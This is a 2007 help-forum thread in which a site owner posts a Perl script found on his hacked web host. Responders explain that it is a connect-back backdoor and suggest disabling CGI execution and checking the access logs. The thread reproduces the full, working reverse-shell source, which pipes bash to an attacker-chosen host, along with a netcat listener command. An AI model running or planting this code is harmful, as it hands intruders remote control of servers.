Solved

Site hacked - Linux/Apache... Perl script involved?

Posted on 2007-03-28
6
508 Views
Last Modified: 2012-06-27
Site hacked last Sunday. I changed the password a few times but somehow they got back in on Tuesday. Has been quiet for 24 hours now. I completely changed the password, wiped out all files in the directory, and re-uploaded clean files. Other than a few modified HTML pages, I found the Perl script listed below. I can't read Perl, can anyone make any sense of this? Does it give any clues as to how they got in? Hosting company has been less than helpful, unfortunately.

Thanks,
-Brad

---------------------------------------------------------------------------------------------

#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell          
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                          
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system      = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
0
Comment
Question by:bbdesign
  • 3
  • 2
6 Comments
 
LVL 1

Accepted Solution

by:
the__tyrant earned 500 total points
ID: 18810637
Looks like they somehow manage to upload this to your site - do you have any file uploads in any of your html pages?  if so do those directories allow the execution of perl scripts?  Could we get a bit more info about the setup of your server/site - like does it allow shell accounts?

Seems as though they are sending back a bash shell through netcat (nc -vv -l -p 2121)
netcat: http://netcat.sourceforge.net/

Tell your service provider to turn off perl/cgi scripts in the apache config, unless you need them, and if you do, only allow scripts to be run out of the cgi-bin. (and if you do have an upload file script, make it upload to a directory other than cgi-bin)
0
 

Author Comment

by:bbdesign
ID: 18810705
No file uploads in the PHP pages.

I believe the only interactivity is the contact form. Would that be affected if I turn off perl/cgi scripts? Definitely no file upload scripts, though.

If that isn't the case, not sure how they would have gotten the file there, other than by knowing the username/password. This was a brand new hosting account, brand new IP, etc. Was only up for a few days.

I'll check with the hosting provider on some of the other items you mention.

Thanks.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810854
Well if you've got only php scripts and no perl scripts anywhere, then nothing would be effected.   Not exactly sure...could the username/password be easily cracked? (does the password have special chars like ! or : or whatver else as well as numbers?)

the hosting provider should be worried about this since they are gaining access to a server controlled by them - ask them for the system logs pertaining to your site/user maybe, might shed some more light on how they are getting the script on the server.
0
Easy, flexible multimedia distribution & control

Coming soon!  Ideal for large-scale A/V applications, ATEN's VM3200 Modular Matrix Switch is an all-in-one solution that simplifies video wall integration. Easily customize display layouts to see what you want, how you want it in 4k.

 

Author Comment

by:bbdesign
ID: 18810898
Password is pretty secure. Like I said, this was a brand new account, in within 48 hours it was hacked.

Hosting provider is surprisingly less worried than I thought they would be. Have to break through their first line of tech support, probably.

Thanks for your help.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810973
Hopefully it gets solved, but in any case i think the best bet would to get the provider to stop disable perl execution on any of your web exposed directories.

Cheers, and good luck with tech support ;)
0
 
LVL 39

Expert Comment

by:Adam314
ID: 18811823
You can probably get the access logs - most hosting providers will give those to you.  Look through this for anything suspicious.

0

Featured Post

Comprehensive Backup Solutions for Microsoft

Acronis protects the complete Microsoft technology stack: Windows Server, Windows PC, laptop and Surface data; Microsoft business applications; Microsoft Hyper-V; Azure VMs; Microsoft Windows Server 2016; Microsoft Exchange 2016 and SQL Server 2016.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Checking the Alert Log in AWS RDS Oracle can be a pain through their user interface.  I made a script to download the Alert Log, look for errors, and email me the trace files.  In this article I'll describe what I did and share my script.
Envision that you are chipping away at another e-business site with a team of pundit developers and designers. Everything seems, by all accounts, to be going easily.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…

821 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question